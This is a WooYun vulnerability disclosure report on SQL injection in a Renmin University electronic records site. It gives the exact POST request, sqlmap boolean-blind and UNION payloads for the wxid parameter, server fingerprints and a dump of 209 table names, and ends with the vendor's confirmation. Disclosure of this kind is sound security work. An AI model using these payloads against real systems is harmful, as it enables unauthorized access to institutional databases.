当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107614

漏洞标题:中国人民大学某站存在SQL注入漏洞

相关厂商:中国人民大学

漏洞作者: 深度安全实验室

提交时间:2015-04-14 18:46

修复时间:2015-05-30 09:24

公开时间:2015-05-30 09:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-14: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经确认,细节仅向厂商公开
2015-04-25: 细节向核心白帽子及相关领域专家公开
2015-05-05: 细节向普通白帽子公开
2015-05-15: 细节向实习白帽子公开
2015-05-30: 细节向公众公开

简要描述:

详细说明:

http://erm-kbs.ruc.edu.cn/

电子文件管理知识库,存在SQL注入

POST /ext/getwx.ashx?t=info HTTP/1.1
Content-Length: 99
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://erm-kbs.ruc.edu.cn:80/Ext/WxDetail.aspx?type=50&id=d9ef9331-1aae-46fd-85f5-956711b5f083
Host: erm-kbs.ruc.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
wxid=d9ef9331-1aae-46fd-85f5-956711b5f083&wxtype=50

wxid参数

1.JPG


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: wxid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' AND 4059=4059 AND 'uPCZ'='uPCZ&wxtype=50
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: wxid=d9ef9331-1aae-46fd-85f5-956711b5f083' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(113)+CHAR(120)+CHAR(102)+CHAR(69)+CHAR(82)+CHAR(81)+CHAR(87)+CHAR(67)+CHAR(66)+CHAR(111)+CHAR(86)+CHAR(113)+CHAR(119)+CHAR(110)+CHAR(111)+CHAR(113),NULL-- &wxtype=50
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: renda
[209 tables]
+---------------------------+
| DB_FWQPZ |
| DB_SHAITU |
| DB_ZDDY |
| DB_ZDDYPZ |
| D_FGF |
| D_FLB |
| D_PZK |
| Droit_Item |
| DropMessages |
| F_TABLE |
| FullTextIndexFiles |
| FullTextIndexFiles_backup |
| GROUPS |
| Info2kGetDwg |
| InfoSysDocument |
| OA_INFO |
| OPERATORS |
| RIGHT_LIST |
| RIGHT_TREE |
| S_AUTOSET |
| S_BORROW_1 |
| S_DALX |
| S_GLMS |
| S_KUFANG_1 |
| S_LOG |
| S_MLINdex |
| S_MLS |
| S_QZH |
| S_REPORT |
| S_TJPROJECT |
| TMP_S_BORROW_1 |
| UserCounter |
| code01dict |
| code02dict |
| code11dict |
| code12dict |
| code15dict |
| code16dict |
| code17dict |
| code18dict |
| code19dict |
| code20dict |
| code21dict |
| code22dict |
| code23dict |
| code24dict |
| code25dict |
| code26dict |
| code27dict |
| code28dict |
| code29dict |
| code30dict |
| code31dict |
| code32dict |
| code33dict |
| code34dict |
| code35dict |
| code36dict |
| code37dict |
| code38dict |
| codetypedict |
| datatable102 |
| datatable103 |
| datatable104 |
| datatable105 |
| datatable106 |
| datatable107 |
| datatable109 |
| datatable111 |
| datatable114 |
| datatable115 |
| datatable116 |
| datatable117 |
| datatable118 |
| datatable119 |
| datatable120 |
| datatable121 |
| datatable85 |
| datatable86 |
| datatable87 |
| datatable88 |
| datatable89 |
| datatable90 |
| destroy_datatable102 |
| destroy_datatable103 |
| destroy_datatable104 |
| destroy_datatable105 |
| destroy_datatable106 |
| destroy_datatable107 |
| destroy_datatable109 |
| destroy_datatable111 |
| destroy_datatable114 |
| destroy_datatable115 |
| destroy_datatable116 |
| destroy_datatable117 |
| destroy_datatable118 |
| destroy_datatable119 |
| destroy_datatable120 |
| destroy_datatable121 |
| destroy_datatable85 |
| destroy_datatable86 |
| destroy_datatable87 |
| destroy_datatable88 |
| destroy_datatable89 |
| destroy_datatable90 |
| destroy_sw |
| dtproperties |
| e_datatable102 |
| e_datatable103 |
| e_datatable104 |
| e_datatable105 |
| e_datatable106 |
| e_datatable107 |
| e_datatable109 |
| e_datatable111 |
| e_datatable114 |
| e_datatable115 |
| e_datatable116 |
| e_datatable117 |
| e_datatable118 |
| e_datatable119 |
| e_datatable120 |
| e_datatable121 |
| e_datatable85 |
| e_datatable86 |
| e_datatable87 |
| e_datatable88 |
| e_datatable89 |
| e_datatable90 |
| e_destroy_datatable102 |
| e_destroy_datatable103 |
| e_destroy_datatable104 |
| e_destroy_datatable105 |
| e_destroy_datatable106 |
| e_destroy_datatable107 |
| e_destroy_datatable109 |
| e_destroy_datatable111 |
| e_destroy_datatable114 |
| e_destroy_datatable115 |
| e_destroy_datatable116 |
| e_destroy_datatable117 |
| e_destroy_datatable118 |
| e_destroy_datatable119 |
| e_destroy_datatable120 |
| e_destroy_datatable121 |
| e_destroy_datatable85 |
| e_destroy_datatable86 |
| e_destroy_datatable87 |
| e_destroy_datatable88 |
| e_destroy_datatable89 |
| e_destroy_datatable90 |
| eplotjiekou |
| fafangcode |
| jiekou |
| plot_info |
| right_detail |
| s_Condition |
| s_kufanginfo |
| s_mkset |
| s_userset |
| s_xtpxzd |
| tableform |
| tmp_datatable102 |
| tmp_datatable103 |
| tmp_datatable104 |
| tmp_datatable105 |
| tmp_datatable106 |
| tmp_datatable107 |
| tmp_datatable109 |
| tmp_datatable111 |
| tmp_datatable114 |
| tmp_datatable115 |
| tmp_datatable116 |
| tmp_datatable117 |
| tmp_datatable118 |
| tmp_datatable119 |
| tmp_datatable120 |
| tmp_datatable121 |
| tmp_datatable85 |
| tmp_datatable86 |
| tmp_datatable87 |
| tmp_datatable88 |
| tmp_datatable89 |
| tmp_datatable90 |
| tsqx |
| usertbl |
| userwebqx |
| view_datatable102 |
| view_datatable103 |
| view_datatable104 |
| view_datatable105 |
| view_datatable106 |
| view_datatable107 |
| view_datatable109 |
| view_datatable111 |
| view_datatable114 |
| view_datatable115 |
| view_datatable116 |
| view_datatable117 |
| view_datatable118 |
| view_datatable119 |
| view_datatable120 |
| view_datatable121 |
| view_datatable85 |
| view_datatable86 |
| view_datatable87 |
| view_datatable88 |
| view_datatable89 |
| view_datatable90 |
+---------------------------+

2.JPG


漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-04-15 09:24

厂商回复:

非常感谢!已通知。

最新状态:

暂无